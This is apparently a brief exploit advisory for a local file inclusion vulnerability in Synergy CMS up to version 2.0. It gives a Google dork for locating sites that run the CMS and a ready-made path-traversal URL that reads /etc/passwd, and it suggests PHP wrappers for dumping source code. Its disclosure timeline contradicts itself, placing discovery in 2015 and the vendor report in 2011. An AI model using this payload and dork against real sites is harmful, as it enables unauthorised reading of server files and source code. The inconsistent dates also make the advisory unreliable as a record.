##################################################
Synergy CMS lfi vulnerability
##################################################

*# Product: Synergy CMS
*# Vulnerability: Post-authentication local file inclusion
*# Impact: Medium/Limited*
*# Authors: Jan Hodermarsky and Lukas Andruska
*# Vendor Homepage: http://www.s-e.lt
*# Affected versions: <= 2.0
*# Tested on: Mozilla Firefox 36
*# Google Dork: intext:"Svetainių kūrimas: "Synergy Effect"

[05/01/2015] - Vulnerabilities discovered
[07/01/2011] - Issues reported to the vendor [www.s-e.lt]
[12/01/2012] - Public disclosure

*# Exploit
domain.com/index.php?admin=1&body=../../../../../etc/passwd

If there is no security measure at place like openbasedir, then you're free to load any local files on the server.

http://domain.com/index.php?admin=1&body=../../../../../etc/passwd

If allow_url(fopen|include) is enabled on server, you can use PHP wrappers (e.g. php://filter) to see the source code of files which have Smarty framework in use.
Loading files which use Smarty framework (like ../includes/get.php) directly without a wrapper will cause a PHP error.



===========================================[End]=============================================�